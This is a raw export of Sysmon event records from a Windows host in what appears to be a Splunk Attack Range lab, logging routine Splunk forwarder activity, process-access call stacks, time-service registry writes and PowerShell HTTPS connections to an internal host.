Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E8FEF83DD662DED04D1E0D09E808A82,SHA256=01BC053FC8A4B384E5C27256CB1DB78396E67496DBCB159335483E9BC62130C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:01.687{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E3B990D96751C28A632DB160ADEDD42,SHA256=CB6333A4451520B95D0117C0370041FE2CE84B21AE177E2659EE8A0154D0E508,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:31.509{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50595-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:01.006{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CEDD9C8FF3600F505A726CCE99345146,SHA256=184E81FF0C1881AD1BB590B8F5A11BF6FCA681E4F8F37556F74B7FABE6DE55DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:02.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=060C93BA88FABDBC036FE30F94501E22,SHA256=6A03E4E6DCE6FC81EB3E7B7B518DEE9202E99B48120D348BC9F16A05498F9BE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:03.719{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=864F6A906AD14712F965BD5FB9BD51E5,SHA256=A6AD455B70FB67D95BF716880E85341ECA24ADA1D68878BB6EFD8D388695039D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:04.734{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1791748269060866DBA76875482735FC,SHA256=584BD355C50A5E3524189AE7E3D82E155A09620FEBC8A82FCFFEF878EA82C691,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:33.923{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50596-false10.0.1.12-8000- 23542300x800000000000000036497940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:05.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8BAF7621937AF2B91FC98789F07D5439,SHA256=F88ED296459D89128CA0032A2759FE71B4046D2E4016844ACD1AE9E5B862A879,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:05.764{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B78E57F998E8E1092B7547EC29C63BE2,SHA256=A3FB20570A9342D2D294B214A4AAFB99E73A7FAB786DBB7FC68DE39C8BB974BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036497938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:05.501{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a96b-0x3b77cc25) 23542300x800000000000000036497943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:06.781{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=576454CD8661FA60814A3CA24BB35964,SHA256=106F07664ECE5D45C6178DBA172757D6BC46E4C90CE9452E0EFCB2D6436011E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.165{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse169.254.169.123-123ntp 354300x800000000000000036497941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:36.520{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50597-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036497952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A187-6140-9456-04000000C801}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A187-6140-9456-04000000C801}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A187-6140-9456-04000000C801}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.948{B81B27B7-A187-6140-9456-04000000C801}5280C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.815{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C778F69A181BB8089F33A9D33E874433,SHA256=98B1C22135343723BDCBC6DA7BE1206284322A188986F71941A0FD10E71B4415,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.845{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0149572B6DF6F8DAA327DAC59D726DF4,SHA256=5AF0978F717638B9D00D34E5F4A515614F518F8DFFB69D7B4E44A27CF0589B5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.661{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A188-6140-9556-04000000C801}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.661{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.661{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.661{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.661{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.661{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A188-6140-9556-04000000C801}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.661{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A188-6140-9556-04000000C801}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.646{B81B27B7-A188-6140-9556-04000000C801}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036497953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:08.131{B81B27B7-A187-6140-9456-04000000C801}52806400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:09.861{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52961D4B15C5D351155F56FC7FFA3E88,SHA256=FA3BDDDB47EF40A9A69DB40974A717F67F488B5B34B84E2C59E13CB323DE3A44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:09.114{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3357F53858A2A3F9698DCFD110EAA3C0,SHA256=D8FD2C1DF0E380A0B5744B7E4B594451D659B9DEF2D610E73638DBDAE0FDF5BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:09.114{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B9A37D6741E89E9998D9044B186D37C,SHA256=B8AF4B87BD56CD701E704ADE0CF5AE6EE12D92D5A3946EEF066C184E9608A8D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.947{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50598-false10.0.1.12-8000- 23542300x800000000000000036497967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:10.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89290D28D32FE360ADB5C308664BFB2D,SHA256=F2ABF0CA5B3775738D33DF8DBAF2B8982481EC4D3D61052816D7F0C55E0785F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:10.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F43A52DBF49AB4A70905BFABF380D33D,SHA256=CDEDAB0CCA3736692F121BF2262120FE82772794A3857D92C064C2787D10B765,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 